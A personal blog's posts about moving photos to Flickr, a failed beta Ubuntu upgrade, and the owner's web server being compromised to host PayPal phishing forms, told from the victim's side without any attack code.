Website

Happy New Year to everyone. Have a great Ought-Seven.

Photos are back, but this time I'm going with Flickr. IT has a pretty doggone slick interface for managing and organizing your photo library as well as a nice API for extending or integrating their services into web applications. Pretty cool stuff. Only downside is that they do change a ~$25.00/year fee for their "pro" service (2GB worth of photo transfers a month). Still pretty worth it, though for that price I'd like to be able to archive the original resolution pictures on their site. Currently I'm posting everything at 800x600 resolution for screen viewing.

If you have any photos you'd like added to Flickr, just let me know and I'll get them posted for you.

After an extended outage, I'm happy to report that Coomey.net is back in action. What happened was this: I got too zealous upgrading my webserver machine. I currently am enjoying the Ubuntu flavor of Linux on the server, and wanted to check out what was the latest and greatest BETA version of the software (duh, I couldn't see problems coming?).

Well, I did a dist-upgrade to the new version, everything downloaded and installed OK, but when I rebooted the server, it hung. As it turned out, there is a known bug in the version of the PPC kernel released with that package. So the box was hosed.

Silver lining now though, I am running on a real server with real bandwidth. The site shouldn't go down daily like before.

Again, thanks Jeff!

If you've noticed that Coomey.net has been gone for the past few days, there is a pretty good reason for it. I'd been hacked. By Pakistani terrorists. Here's the scoop:

On Tuesday night, I got home from work and my cable Internet connection was shut off. I called Charter and they told me that they had received a complaint that my IP address had been serving phony PayPal phishing pages. After talking with Charter's incident response dude, the turned my connection back on. I did a quick scan of the webroot of my web server (YDL Linux 4.1) and didn't see any signs of mischief. I figured that at worst my DNS was temporarily hijacked and my domain name was pointing to some bad guy's machine.

Fast-forward to Wednesday night. This time I get home and my dynamic DNS provider (ZoneEdit) had suspended my service. Here we go again. Paypal had sent details of this PayPal phishing issue to ZoneEdit. I dug a little deeper into my webroot...

...and found a 'hidden' directory called .tikiwiki (note to self: always use a -a flag when doing an ls). Sure enough, someone had indeed hacked the box and placed all kinds of phony paypal forms on my machine. A scan of the Apache logs proved that some folks were indeed tricked and submitted their personal information via my website to an unknown scammer. Yikes, this is bad.

I quickly removed the offending files and did a comprehensive scan of the source code of the phony forms which are are all unsophisticated PHP scripts. Essentially they fake people into entering all their credit card info and then email the informatio to an email address. A hard-coded email address even: chinioti@gmail.com. I did a quick Google search on this email address, and it looks like this character is a Pakistani (probably about 15 years old in my opinion from his 'Net ramblings) who is part of a hacking group called Whackerz Pakistan (have as much fun with that name as you see fit ) that has been ver busy defacing Western websites in the name of Islam after the whole Danish cartoon affair. It's scary that these folks did not deface my site. They most certainly wanted nobody to know they were there. Creepy.

Still, I have no idea how they got in. Looks like they didn't brute-force and SSH login which I originally thought. Perhaps a security hole in the blog engine Serendipity? If anyone has any ideas on how they could have gotten in, I'd be extremely grateful.